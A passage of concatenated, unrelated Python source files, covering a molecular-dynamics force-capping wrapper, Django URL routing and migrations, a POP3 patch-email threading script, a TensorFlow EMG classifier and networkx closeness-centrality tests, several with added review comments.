        :param particleGroup: optional group to restrict capping to
        """
        # Only ranks that belong to the active PMI CPU group construct the
        # underlying C++ object; other ranks skip initialization entirely.
        if not (pmi._PMIComm and pmi._PMIComm.isActive()) or pmi._MPIcomm.rank in pmi._PMIComm.getMPIcpugroup():
            # Identity comparison `is None` is the correct idiom here; the
            # original `== None` depended on particleGroup's __eq__.
            if (particleGroup is None) or (particleGroup.size() == 0):
                cxxinit(self, integrator_CapForce, system, capForce)
            else:
                cxxinit(self, integrator_CapForce, system, capForce, particleGroup)

if pmi.isController :
    # On the controller rank, expose CapForce as a PMI proxy class that
    # forwards the listed calls and properties to the CapForceLocal
    # instances living on the worker ranks.
    class CapForce(Extension, metaclass=pmi.Proxy):
        pmiproxydefs = dict(
            cls =  'espressopp.integrator.CapForceLocal',
            pmicall = ['setCapForce', 'setAbsCapForce', 'getCapForce', 'getAbsCapForce'],
            pmiproperty = [ 'particleGroup', 'adress' ]
            )

# -*- coding: utf-8 -*-
"""proyectoP4 URL Configuration

The `urlpatterns` list routes URLs to views. For more information please see:
    https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
    1. Add an import:  from my_app import views
    2. Add a URL to urlpatterns:  url(r'^$', views.home, name='home')
Class-based views
    1. Add an import:  from other_app.views import Home
    2. Add a URL to urlpatterns:  url(r'^$', Home.as_view(), name='home')
Including another URLconf
    1. Add an import:  from blog import urls as blog_urls
    2. Add a URL to urlpatterns:  url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url, patterns
from django.contrib import admin
from Workinout import views
from django.conf import settings

# Core routes: the admin site plus the Workinout app's own urls module.
urlpatterns = [
    url(r'^admin/', include(admin.site.urls)),
    url(r'^Workinout/', include('Workinout.urls')), # ADD THIS NEW TUPLE!media/(?P<path>.*)
]


if settings.DEBUG:
    # Development only: let django.views.static.serve deliver uploaded media.
    # NOTE(review): `patterns()` was removed in Django 1.10; this URLconf
    # targets 1.8 per the module docstring -- confirm before upgrading.
    urlpatterns += patterns(
        'django.views.static',
        (r'media/(?P<path>.*)',
        'serve',
        {'document_root': settings.MEDIA_ROOT}), )
else:
    # NOTE(review): serving static files through Django with DEBUG=False is
    # unusual; production setups normally hand ^static/ to the web server.
    urlpatterns += patterns('', url(r'^static/(?P<path>.*)$', 'django.views.static.serve', {'document_root': settings.STATIC_PATH}),
    )

#!/usr/bin/python

# This programs is intended to manage patches and apply them automatically
# through email in an automated fashion.
#
# Copyright (C) 2008  Imran M Yousuf (imran@smartitengineering.com)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

import poplib, email, re, sys, xmlConfigs, utils;

class ReferenceNode :
    """One email message in the patch-reference tree.

    node         -- the message-id string.
    emailMessage -- the parsed email message object.
    references   -- message-ids this message refers to (oldest first).
    children     -- message-id -> ReferenceNode of messages referencing this one.
    slotted      -- whether the node has been placed in the tree.
    """

    def __init__(self, node, emailMessage, references=None, children=None, slotted=False):
        # The original signature used mutable defaults (`references=list(),
        # children=dict()`) and `slotted=bool("false")` -- which is True,
        # since any non-empty string is truthy; the intent was clearly False.
        # None-sentinels plus per-instance copies fix both pitfalls while
        # remaining call-compatible.
        self.node = node
        self.children = dict(children) if children is not None else {}
        self.references = list(references) if references is not None else []
        self.slotted = slotted
        self.emailMessage = emailMessage
    def get_node(self):
        return self.node
    def get_children(self):
        return self.children
    def set_node(self, node):
        self.node = node
    def set_children(self, children):
        self.children = children
    def get_references(self):
        return self.references
    def is_slotted(self):
        return self.slotted
    def set_slotted(self, slotted):
        self.slotted = slotted
    def get_message(self):
        return self.emailMessage
    def __repr__(self):
        return self.node + "\nREF: " + str(self.references) + "\nChildren: " + str(self.children.keys()) + "\n"

def handleNode(currentNodeInAction, referenceNodeNow, referencesToCheck, patchMessageReferenceNode):
    """Advance one step while slotting a message under its ancestors.

    If any remaining reference is a child of the current tree node, consume
    that reference and return the matching node to descend into.  Once no
    references remain, attach the message being slotted as a child here and
    return None (ending the caller's walk).
    """
    for ref in list(referencesToCheck):
        if ref in referenceNodeNow.get_children():
            referencesToCheck.remove(ref)
            return patchMessageReferenceNode[ref]
    if not referencesToCheck:
        referenceNodeNow.get_children()[currentNodeInAction.get_node()] = currentNodeInAction

def makeChildren(patchMessageReferenceNode) :
    """Wire every message node under its parent by walking its References
    chain in order.

    patchMessageReferenceNode -- dict mapping message-id -> ReferenceNode.
    Uses the module-global `verbose` flag for logging.
    """
    # sorted(d) iterates the keys in sorted order and works on Python 2 and 3
    # alike; the original `keys = d.keys(); keys.sort()` crashes on Python 3,
    # where dict.keys() returns a view object that has no .sort() method.
    for messageId in sorted(patchMessageReferenceNode):
        referenceNode = patchMessageReferenceNode[messageId]
        utils.verboseOutput(verbose, "Managing Message Id:", referenceNode.get_node())
        referenceIds = referenceNode.get_references()
        referenceIdsClone = referenceIds[:]
        utils.verboseOutput(verbose, "Cloned References: ", referenceIdsClone)
        if len(referenceIds) > 0 :
            # Start from the first (oldest) referenced message and follow the
            # chain until handleNode slots the current node somewhere.
            nextNode = patchMessageReferenceNode[referenceIdsClone[0]]
            referenceIdsClone.remove(referenceIdsClone[0])
            while nextNode != None :
                utils.verboseOutput(verbose, "Next Node: ", nextNode.get_node())
                utils.verboseOutput(verbose, "Curent Node: ", referenceNode.get_node())
                utils.verboseOutput(verbose, "REF: ", referenceIdsClone)
                nextNode = handleNode(referenceNode, nextNode, referenceIdsClone, patchMessageReferenceNode)

if __name__ == "__main__":
    # Hand-rolled argv scan: only -v/--verbose is recognized.  `verbose` is
    # kept as the strings "true"/"false" (utils.verboseOutput presumably
    # tests the string value -- confirm against utils).
    arguments = sys.argv
    verbose = "false"
    pseudoArgs = arguments[:]
    while len(pseudoArgs) > 1 :
        argument = pseudoArgs[1]
        if argument == "-v" or argument == "--verbose" :
            verbose = "true"
        pseudoArgs.remove(argument)
    utils.verboseOutput(verbose, "Checking POP3 for gmail")
    try:
        # POP3 connection settings come from an XML file next to the script.
        emailConfig = xmlConfigs.initializePopConfig("./email-configuration.xml")
        myPop = emailConfig.get_pop3_connection()
        numMessages = len(myPop.list()[1])
        patchMessages = dict()
        for i in range(numMessages):
            utils.verboseOutput(verbose, "Index: ", i)
            # Reassemble the raw message from the POP3 line list.
            totalContent = ""
            for content in myPop.retr(i+1)[1]:
                totalContent += content + '\n'
            msg = email.message_from_string(totalContent)
            # Keep only messages whose subject looks like "[... PATCH ...] ...".
            if 'subject' in msg :
                subject = msg['subject']
                # NOTE(review): should be a raw string (r"^\[.*PATCH.*\].+")
                # to avoid invalid-escape warnings on Python 3.
                subjectPattern = "^\[.*PATCH.*\].+"
                subjectMatch = re.match(subjectPattern, subject)
                utils.verboseOutput(verbose, "Checking subject: ", subject)
                if subjectMatch == None :
                    continue
            else :
                continue
            messageId = ""
            if 'message-id' in msg:
                # Strip the surrounding <> from the Message-ID header.
                messageId = re.search("<(.*)>", msg['message-id']).group(1)
                utils.verboseOutput(verbose, 'Message-ID:', messageId)
            referenceIds = []
            if 'references' in msg:
                references = msg['references']
                referenceIds = re.findall("<(.*)>", references)
            utils.verboseOutput(verbose, "References: ", referenceIds)
            currentNode = ReferenceNode(messageId, msg, referenceIds)
            patchMessages[messageId] = currentNode
            # NOTE(review): bool("false") is True (non-empty string), so this
            # actually marks the node as slotted -- looks unintended; confirm.
            currentNode.set_slotted(bool("false"))
        utils.verboseOutput(verbose, "**************Make Children**************")
        makeChildren(patchMessages)
        utils.verboseOutput(verbose, "--------------RESULT--------------")
        utils.verboseOutput(verbose, patchMessages)
    except:
        # NOTE(review): bare except swallows every failure (even SystemExit)
        # and only reports it when verbose output is enabled.
        utils.verboseOutput(verbose, "Error: ", sys.exc_info())


# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-02-20 22:01
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):
    """Add Issue.force_free_access (auto-generated by Django 1.10.4)."""

    dependencies = [
        ('erudit', '0065_auto_20170202_1152'),
    ]

    operations = [
        # Boolean flag forcing open access on an issue; the verbose name is
        # intentionally French ("Contraindre en libre accès").
        migrations.AddField(
            model_name='issue',
            name='force_free_access',
            field=models.BooleanField(default=False, verbose_name='Contraindre en libre accès'),
        ),
    ]

# Example implementing 5 layer encoder
# Original code taken from
# https://github.com/aymericdamien/TensorFlow-Examples/blob/master/examples/3_NeuralNetworks/autoencoder.py
# The model trained here is restored in load.py

from __future__ import division, print_function, absolute_import

# Import MNIST data
# from tensorflow.examples.tutorials.mnist import input_data
# data_set = input_data.read_data_sets("/tmp/data/", one_hot=True)

# Import libraries
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import sys
import scipy.io as sio
sys.path.insert(0, '../..') # Add path to where TF_Model.py is, if not in the same dir
from TF_Model import *
from utils import *


# 01 thumb
# 10 pinky
# Map action id -> one-hot label vector ([thumb, pinky] per the note above).
action_map = {}
action_map[1] = [0,1]
action_map[2] = [1,0]

# thumb up
# NOTE(review): absolute, machine-specific data paths.  The "thumb up"
# section loads Fred_pinky_* files and the "pinky up" section loads
# Fred_thumb_* -- confirm the label/file pairing is intended.
mat_contents_t0 = sio.loadmat('/home/linda/school/capstone/data/set2_new_format/EMGjan5/Fred_pinky_Jan5_0.mat')
mat_contents_t1 = sio.loadmat('/home/linda/school/capstone/data/set2_new_format/EMGjan5/Fred_pinky_Jan5_1.mat')
mat_contents_test0 = sio.loadmat('/home/linda/school/capstone/data/set2_new_format/EMGjan5/Fred_pinky_jan5_2.mat')


# Raw EMG matrices stored under the 'EMGdata' key of each .mat file.
data_t0 = mat_contents_t0['EMGdata']
data_t1 = mat_contents_t1['EMGdata']
data_test0 = mat_contents_test0['EMGdata']

# Convert raw recordings into (labels, features) batches; the helper comes
# from the project-local utils module.
batch_y_t0, batch_x_t0 = get_batch_from_raw_data_new_format(data_t0, action_map, [0])
batch_y_t1, batch_x_t1 = get_batch_from_raw_data_new_format(data_t1, action_map, [0])
batch_y_test0, batch_x_test0 = get_batch_from_raw_data_new_format(data_test0, action_map, [0])

# pinky up
mat_contents_p0 = sio.loadmat('/home/linda/school/capstone/data/set2_new_format/EMGjan5/Fred_thumb_Jan5_0.mat')
mat_contents_p1 = sio.loadmat('/home/linda/school/capstone/data/set2_new_format/EMGjan5/Fred_thumb_Jan5_1.mat')
mat_contents_test1 = sio.loadmat('/home/linda/school/capstone/data/set2_new_format/EMGjan5/Fred_thumb_Jan5_2.mat')

data_p0 = mat_contents_p0['EMGdata']
data_p1 = mat_contents_p1['EMGdata']
data_test1 = mat_contents_test1['EMGdata']

batch_y_p0, batch_x_p0 = get_batch_from_raw_data_new_format(data_p0, action_map, [0])
batch_y_p1, batch_x_p1 = get_batch_from_raw_data_new_format(data_p1, action_map, [0])
batch_y_test1, batch_x_test1 = get_batch_from_raw_data_new_format(data_test1, action_map, [0])

print("done reading data")
# Create TF_Model, a wrapper for models created using tensorflow
# Note that the configuration file 'config.txt' must be present in the directory
model = TF_Model('model')


# Parameters
learning_rate = 0.05
training_epochs = 200
batch_size = 256        # NOTE(review): defined but never used below
display_step = 1        # NOTE(review): defined but never used below
examples_to_show = 10   # NOTE(review): defined but never used below
# total_batch = int(data_set.train.num_examples/batch_size)
dropout = tf.placeholder(tf.float32)

# Create variables for inputs, outputs and predictions
# x: flattened EMG window of 1000 values; y: one-hot label over 2 classes.
x = tf.placeholder(tf.float32, [None, 1000])
y = tf.placeholder(tf.float32, [None, 2])
y_true = y
y_pred = model.predict(x)

# Cost function
# Mean-squared error between the one-hot labels and the model output.
cost = tf.reduce_mean(tf.pow(y_true - y_pred, 2))
optimizer = tf.train.RMSPropOptimizer(learning_rate).minimize(cost)

# Initializing the variables
# (tf.initialize_all_variables is the pre-1.0 TensorFlow API.)
init = tf.initialize_all_variables()
sess = tf.Session()
sess.run(init)

# Accuracy graph.  NOTE(review): cross_entropy/train_step are built here but
# the training loop below runs the MSE `optimizer` instead -- confirm which
# objective was intended; tf.log of a zero output would also produce NaN.
model_output = model.predict(x)
cross_entropy = tf.reduce_mean(-tf.reduce_sum(y * tf.log(model_output), reduction_indices=[1]))
train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)
correct_prediction = tf.equal(tf.argmax(model_output,1), tf.argmax(y,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))


# Train
# One optimizer step per recording per epoch (whole recordings, no mini-batches).
for epoch in range(training_epochs):
    _, c = sess.run([optimizer, cost], feed_dict={x: batch_x_t0, y: batch_y_t0})
    _, c = sess.run([optimizer, cost], feed_dict={x: batch_x_t1, y: batch_y_t1})
    _, c = sess.run([optimizer, cost], feed_dict={x: batch_x_p0, y: batch_y_p0})
    _, c = sess.run([optimizer, cost], feed_dict={x: batch_x_p1, y: batch_y_p1})

    # Display logs per epoch step
    # `c` only reflects the cost of the last of the four runs above.
    print("Epoch:", '%04d' % (epoch+1), "cost=", "{:.9f}".format(c))
    print(sess.run(accuracy, feed_dict={x: batch_x_test0, y: batch_y_test0}))
    print(sess.run(accuracy, feed_dict={x: batch_x_test1, y: batch_y_test1}))
print("===final===")
print(sess.run(accuracy, feed_dict={x: batch_x_test0, y: batch_y_test0}))
print(sess.run(accuracy, feed_dict={x: batch_x_test1, y: batch_y_test1}))
# Save
# Persist the trained model under the name 'example_3'.
model.save(sess, 'example_3')

"""
Tests for closeness centrality.
"""
import pytest
import networkx as nx
from networkx.testing import almost_equal


class TestClosenessCentrality:
    """Tests for nx.closeness_centrality and nx.incremental_closeness_centrality."""

    @classmethod
    def setup_class(cls):
        """Build the shared test graphs once for the whole test class."""
        cls.K = nx.krackhardt_kite_graph()
        cls.P3 = nx.path_graph(3)
        cls.P4 = nx.path_graph(4)
        cls.K5 = nx.complete_graph(5)

        cls.C4 = nx.cycle_graph(4)
        cls.T = nx.balanced_tree(r=2, h=2)
        cls.Gb = nx.Graph()
        cls.Gb.add_edges_from([(0, 1), (0, 2), (1, 3), (2, 3), (2, 4), (4, 5), (3, 5)])

        F = nx.florentine_families_graph()
        cls.F = F

        cls.LM = nx.les_miserables_graph()

        # Create random undirected, unweighted graph for testing incremental version
        cls.undirected_G = nx.fast_gnp_random_graph(n=100, p=0.6, seed=123)
        cls.undirected_G_cc = nx.closeness_centrality(cls.undirected_G)

    def test_wf_improved(self):
        """Wasserman-Faust scaling on vs off for a two-component graph."""
        G = nx.union(self.P4, nx.path_graph([4, 5, 6]))
        c = nx.closeness_centrality(G)
        cwf = nx.closeness_centrality(G, wf_improved=False)
        res = {0: 0.25, 1: 0.375, 2: 0.375, 3: 0.25, 4: 0.222, 5: 0.333, 6: 0.222}
        wf_res = {0: 0.5, 1: 0.75, 2: 0.75, 3: 0.5, 4: 0.667, 5: 1.0, 6: 0.667}
        for n in G:
            assert almost_equal(c[n], res[n], places=3)
            assert almost_equal(cwf[n], wf_res[n], places=3)

    def test_digraph(self):
        """Directed path: closeness uses incoming distance; reversed flips it."""
        G = nx.path_graph(3, create_using=nx.DiGraph())
        c = nx.closeness_centrality(G)
        cr = nx.closeness_centrality(G.reverse())
        d = {0: 0.0, 1: 0.500, 2: 0.667}
        dr = {0: 0.667, 1: 0.500, 2: 0.0}
        for n in sorted(self.P3):
            assert almost_equal(c[n], d[n], places=3)
            assert almost_equal(cr[n], dr[n], places=3)

    def test_k5_closeness(self):
        """Every node of K5 has maximal closeness 1.0."""
        c = nx.closeness_centrality(self.K5)
        d = {0: 1.000, 1: 1.000, 2: 1.000, 3: 1.000, 4: 1.000}
        for n in sorted(self.K5):
            assert almost_equal(c[n], d[n], places=3)

    def test_p3_closeness(self):
        """Known closeness values on the 3-node path."""
        c = nx.closeness_centrality(self.P3)
        d = {0: 0.667, 1: 1.000, 2: 0.667}
        for n in sorted(self.P3):
            assert almost_equal(c[n], d[n], places=3)

    def test_krackhardt_closeness(self):
        """Known closeness values on the Krackhardt kite graph."""
        c = nx.closeness_centrality(self.K)
        d = {
            0: 0.529,
            1: 0.529,
            2: 0.500,
            3: 0.600,
            4: 0.500,
            5: 0.643,
            6: 0.643,
            7: 0.600,
            8: 0.429,
            9: 0.310,
        }
        for n in sorted(self.K):
            assert almost_equal(c[n], d[n], places=3)

    def test_florentine_families_closeness(self):
        """Known closeness values on the Florentine families graph."""
        c = nx.closeness_centrality(self.F)
        d = {
            "Acciaiuoli": 0.368,
            "Albizzi": 0.483,
            "Barbadori": 0.4375,
            "Bischeri": 0.400,
            "Castellani": 0.389,
            "Ginori": 0.333,
            "Guadagni": 0.467,
            "Lamberteschi": 0.326,
            "Medici": 0.560,
            "Pazzi": 0.286,
            "Peruzzi": 0.368,
            "Ridolfi": 0.500,
            "Salviati": 0.389,
            "Strozzi": 0.4375,
            "Tornabuoni": 0.483,
        }
        for n in sorted(self.F):
            assert almost_equal(c[n], d[n], places=3)

    def test_les_miserables_closeness(self):
        """Known closeness values on the Les Miserables co-occurrence graph."""
        c = nx.closeness_centrality(self.LM)
        d = {
            "Napoleon": 0.302,
            "Myriel": 0.429,
            "MlleBaptistine": 0.413,
            "MmeMagloire": 0.413,
            "CountessDeLo": 0.302,
            "Geborand": 0.302,
            "Champtercier": 0.302,
            "Cravatte": 0.302,
            "Count": 0.302,
            "OldMan": 0.302,
            "Valjean": 0.644,
            "Labarre": 0.394,
            "Marguerite": 0.413,
            "MmeDeR": 0.394,
            "Isabeau": 0.394,
            "Gervais": 0.394,
            "Listolier": 0.341,
            "Tholomyes": 0.392,
            "Fameuil": 0.341,
            "Blacheville": 0.341,
            "Favourite": 0.341,
            "Dahlia": 0.341,
            "Zephine": 0.341,
            "Fantine": 0.461,
            "MmeThenardier": 0.461,
            "Thenardier": 0.517,
            "Cosette": 0.478,
            "Javert": 0.517,
            "Fauchelevent": 0.402,
            "Bamatabois": 0.427,
            "Perpetue": 0.318,
            "Simplice": 0.418,
            "Scaufflaire": 0.394,
            "Woman1": 0.396,
            "Judge": 0.404,
            "Champmathieu": 0.404,
            "Brevet": 0.404,
            "Chenildieu": 0.404,
            "Cochepaille": 0.404,
            "Pontmercy": 0.373,
            "Boulatruelle": 0.342,
            "Eponine": 0.396,
            "Anzelma": 0.352,
            "Woman2": 0.402,
            "MotherInnocent": 0.398,
            "Gribier": 0.288,
            "MmeBurgon": 0.344,
            "Jondrette": 0.257,
            "Gavroche": 0.514,
            "Gillenormand": 0.442,
            "Magnon": 0.335,
            "MlleGillenormand": 0.442,
            "MmePontmercy": 0.315,
            "MlleVaubois": 0.308,
            "LtGillenormand": 0.365,
            "Marius": 0.531,
            "BaronessT": 0.352,
            "Mabeuf": 0.396,
            "Enjolras": 0.481,
            "Combeferre": 0.392,
            "Prouvaire": 0.357,
            "Feuilly": 0.392,
            "Courfeyrac": 0.400,
            "Bahorel": 0.394,
            "Bossuet": 0.475,
            "Joly": 0.394,
            "Grantaire": 0.358,
            "MotherPlutarch": 0.285,
            "Gueulemer": 0.463,
            "Babet": 0.463,
            "Claquesous": 0.452,
            "Montparnasse": 0.458,
            "Toussaint": 0.402,
            "Child1": 0.342,
            "Child2": 0.342,
            "Brujon": 0.380,
            "MmeHucheloup": 0.353,
        }
        for n in sorted(self.LM):
            assert almost_equal(c[n], d[n], places=3)

    def test_weighted_closeness(self):
        """Known closeness values with edge weights used as distances."""
        edges = [
            ("s", "u", 10),
            ("s", "x", 5),
            ("u", "v", 1),
            ("u", "x", 2),
            ("v", "y", 1),
            ("x", "u", 3),
            ("x", "v", 5),
            ("x", "y", 2),
            ("y", "s", 7),
            ("y", "v", 6),
        ]
        XG = nx.Graph()
        XG.add_weighted_edges_from(edges)
        c = nx.closeness_centrality(XG, distance="weight")
        d = {"y": 0.200, "x": 0.286, "s": 0.138, "u": 0.235, "v": 0.200}
        for n in sorted(XG):
            assert almost_equal(c[n], d[n], places=3)

    #
    # Tests for incremental closeness centrality.
    #
    @staticmethod
    def pick_add_edge(g):
        """Pick an arbitrary (u, v) pair that is NOT currently an edge of g."""
        u = nx.utils.arbitrary_element(g)
        possible_nodes = set(g.nodes())
        neighbors = list(g.neighbors(u)) + [u]
        possible_nodes.difference_update(neighbors)
        v = nx.utils.arbitrary_element(possible_nodes)
        return (u, v)

    @staticmethod
    def pick_remove_edge(g):
        """Pick an arbitrary (u, v) pair that IS currently an edge of g."""
        u = nx.utils.arbitrary_element(g)
        possible_nodes = list(g.neighbors(u))
        v = nx.utils.arbitrary_element(possible_nodes)
        return (u, v)

    def test_directed_raises(self):
        """Incremental closeness is undirected-only: DiGraph must raise."""
        with pytest.raises(nx.NetworkXNotImplemented):
            dir_G = nx.gn_graph(n=5)
            prev_cc = None
            edge = self.pick_add_edge(dir_G)
            insert = True
            nx.incremental_closeness_centrality(dir_G, edge, prev_cc, insert)

    def test_wrong_size_prev_cc_raises(self):
        """prev_cc with a missing node (wrong size) must raise."""
        with pytest.raises(nx.NetworkXError):
            G = self.undirected_G.copy()
            edge = self.pick_add_edge(G)
            insert = True
            prev_cc = self.undirected_G_cc.copy()
            prev_cc.pop(0)
            nx.incremental_closeness_centrality(G, edge, prev_cc, insert)

    def test_wrong_nodes_prev_cc_raises(self):
        """prev_cc of the right size but wrong node set must raise."""
        with pytest.raises(nx.NetworkXError):
            G = self.undirected_G.copy()
            edge = self.pick_add_edge(G)
            insert = True
            prev_cc = self.undirected_G_cc.copy()
            num_nodes = len(prev_cc)
            prev_cc.pop(0)
            prev_cc[num_nodes] = 0.5
            nx.incremental_closeness_centrality(G, edge, prev_cc, insert)

    def test_zero_centrality(self):
        """Removing a path edge isolates a node, yielding a zero centrality."""
        G = nx.path_graph(3)
        prev_cc = nx.closeness_centrality(G)
        edge = self.pick_remove_edge(G)
        test_cc = nx.incremental_closeness_centrality(G, edge, prev_cc, insertion=False)
        G.remove_edges_from([edge])
        real_cc = nx.closeness_centrality(G)
        shared_items = set(test_cc.items()) & set(real_cc.items())
        assert len(shared_items) == len(real_cc)
        assert 0 in test_cc.values()

    def test_incremental(self):
        """Incremental updates must match full recomputation over 5 edits."""
        # Check that incremental and regular give same output
        G = self.undirected_G.copy()
        prev_cc = None
        for i in range(5):
            if i % 2 == 0:
                # Remove an edge
                insert = False
                edge = self.pick_remove_edge(G)
            else:
                # Add an edge
                insert = True
                edge = self.pick_add_edge(G)

            # start = timeit.default_timer()
            test_cc = nx.incremental_closeness_centrality(G, edge, prev_cc, insert)
            # inc_elapsed = (timeit.default_timer() - start)
            # print(f"incremental time: {inc_elapsed}")

            if insert:
                G.add_edges_from([edge])
            else:
                G.remove_edges_from([edge])

            # start = timeit.default_timer()
            real_cc = nx.closeness_centrality(G)
            # reg_elapsed = (timeit.default_timer() - start)
            # print(f"regular time: {reg_elapsed}")
            # Example output:
            # incremental time: 0.208
            # regular time: 0.276
            # incremental time: 0.00683
            # regular time: 0.260
            # incremental time: 0.0224
            # regular time: 0.278
            # incremental time: 0.00804
            # regular time: 0.208
            # incremental time: 0.00947
            # regular time: 0.188

            assert set(test_cc.items()) == set(real_cc.items())

            prev_cc = test_cc

# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models


class Migration(SchemaMigration):
    """South schema migration: add (forwards) or drop (backwards) the
    unique constraint on ``Vendeur.code_permanent``."""

    def forwards(self, orm):
        """Apply the migration: make ``code_permanent`` unique."""
        # Adding unique constraint on 'Vendeur', fields ['code_permanent']
        db.create_unique(u'encefal_vendeur', ['code_permanent'])


    def backwards(self, orm):
        """Reverse the migration: drop the unique constraint again."""
        # Removing unique constraint on 'Vendeur', fields ['code_permanent']
        db.delete_unique(u'encefal_vendeur', ['code_permanent'])


    # Auto-generated "frozen ORM": a snapshot of the model definitions at the
    # time this migration was created. South uses it to build the ``orm``
    # object passed to forwards()/backwards(). Do not edit by hand.
    models = {
        u'auth.group': {
            'Meta': {'object_name': 'Group'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        u'auth.permission': {
            'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        u'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        u'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        u'encefal.exemplaire': {
            'Meta': {'object_name': 'Exemplaire'},
            'actif': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'date_creation': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'date_modification': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'etat': ('django.db.models.fields.CharField', [], {'default': "'VENT'", 'max_length': '4'}),
            'facture': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'exemplaires'", 'null': 'True', 'db_column': "'facture'", 'to': u"orm['encefal.Facture']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'livre': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'exemplaires'", 'db_column': "'livre'", 'to': u"orm['encefal.Livre']"}),
            'prix': ('django.db.models.fields.IntegerField', [], {}),
            'vendeur': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'exemplaires'", 'db_column': "'vendeur'", 'to': u"orm['encefal.Vendeur']"})
        },
        u'encefal.facture': {
            'Meta': {'object_name': 'Facture'},
            'actif': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'date_creation': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'date_modification': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'employe': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'factures'", 'blank': 'True', 'db_column': "'employe'", 'to': u"orm['auth.User']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'session': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'factures'", 'blank': 'True', 'db_column': "'session'", 'to': u"orm['encefal.Session']"})
        },
        u'encefal.livre': {
            'Meta': {'object_name': 'Livre'},
            'actif': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'auteur': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'date_creation': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'date_modification': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'edition': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'isbn': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '13', 'blank': 'True'}),
            'titre': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'vendeur': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'livres'", 'symmetrical': 'False', 'through': u"orm['encefal.Exemplaire']", 'db_column': "'vendeur'", 'to': u"orm['encefal.Vendeur']"})
        },
        u'encefal.session': {
            'Meta': {'object_name': 'Session'},
            'actif': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'date_creation': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'date_debut': ('django.db.models.fields.DateField', [], {}),
